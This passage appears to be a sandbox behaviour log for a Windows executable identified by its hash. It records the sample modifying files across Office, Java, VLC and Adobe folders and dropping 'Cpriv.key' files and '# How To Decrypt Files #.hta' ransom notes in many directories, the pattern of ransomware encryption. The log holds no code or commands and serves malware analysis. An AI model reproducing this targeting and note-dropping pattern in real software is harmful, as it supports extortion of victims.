de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-spi-quicksearch.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00544_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Internet Explorer\SIGNUP\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\CONVERT\ODBC.SAM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Templates\1033\Access\Part\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\pt_BR\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\System\Ole DB\en-US\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\NavigationRight_ButtonGraphic.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\cs\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\tr\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\rings-desk.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waning-gibbous_partly-cloudy.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SY00127_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Swirl\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145669.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\SIGN.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14693_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\fur\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\Portal\1033\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\81.0.4044.129\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jre7\lib\applet\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\css\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\TN00246_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\MSPUB.DEV.HXS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\ta.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Proofing.en-us\SETUP.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Document Themes 14\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0229385.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\Sounds\Places\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\fr\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0086428.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00914_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21339_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\SoftBlue\background.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Swirl\tab_on.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\ADRESPEL.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\hy\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105292.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0297707.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\Sounds\People\MMHMM.WAV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.CO.KR.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Internet Explorer\en-US\eula.rtf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01084_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\blackbars80.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.di.extensions_0.12.0.v20140417-2033.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00260_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1036\MSO.ACL de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGMASTHD.DPV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\en-US\css\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\LAYERS\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\STRTEDGE\STRTEDGE.INF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00923_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02025_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\LTHD98SP.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\STARTUP\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_right_pressed.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\images\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\nav_leftarrow.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-ui.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\13.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\QUERIES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\readme.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\CONCRETE\CONCRETE.ELM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jre7\lib\fonts\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\am\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows NT\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\tr.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.update\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Bibliography\Sort\YEAR.XSL de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\Presentation Designs\Maple.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Common Files\Adobe\Updater6\AdobeUpdate.cer de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099201.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\THIRDPARTYLICENSEREADME.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME22.CSS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\timer_up.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\9.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\images\back.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-api_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-waxing-gibbous_partly-cloudy.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21329_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\33.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\en-US\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\Smart Tag\LISTS\1033\DATES.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.manipulator_2.0.0.v20131217-1203.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Google\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099165.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\tesselate.x3d de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02750G.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\MSACCESS.DEV_F_COL.HXK de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsTemplates\Status Report.fdt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Reference Assemblies\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\plugins\video_chroma\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00693_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0238983.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD21303_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Microsoft.Office.Interop.InfoPath.SemiTrust.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\MEDIA\EXPLODE.WAV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\Adobe\Updater6\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\epl-v10.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21518_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\FLYERHM.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\zh_TW\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105338.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00494_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\VSTA\Pipeline.v10.0\HostSideAdapters\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18224_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\NotifierDisableDownArrow.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\CONVERT\PAB.SAM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\Access\DataType\Phone.accft de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\js\jquery.jstree.js de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.webapp.nl_zh_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\fontconfig.bfc de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\.eclipseproduct de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152878.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_box_right.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\id.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\EDGE\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185818.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Reference Assemblies\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\MANIFEST.MF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.nl_zh_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\java.security de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-javahelp_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL011.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-api-annotations-common.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382958.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153398.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\Publisher\Backgrounds\J0143752.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsViewAttachmentIconsMask.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\STRBRST.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_flat_10_000000_40x100.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Stationery\Soft Blue.htm de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\NavigationLeft_SelectionSubpicture.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0297749.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\FORMS\1033\DISTLSTL.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Microsoft Visual Studio 8\VSTA\Bin\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD05119_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00057_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Bibliography\Author2XML.XSL de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\VSTO\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.attributeTransformation.exsd de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\skins\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\month.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\Adobe\Help\en_US\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_divider_right.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01293_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\eclipse.inf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\feature.properties de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-spi-quicksearch_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD09662_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-first-quarter_partly-cloudy.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\7zCon.sfx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\NavigationRight_SelectionSubpicture.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\bin\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program 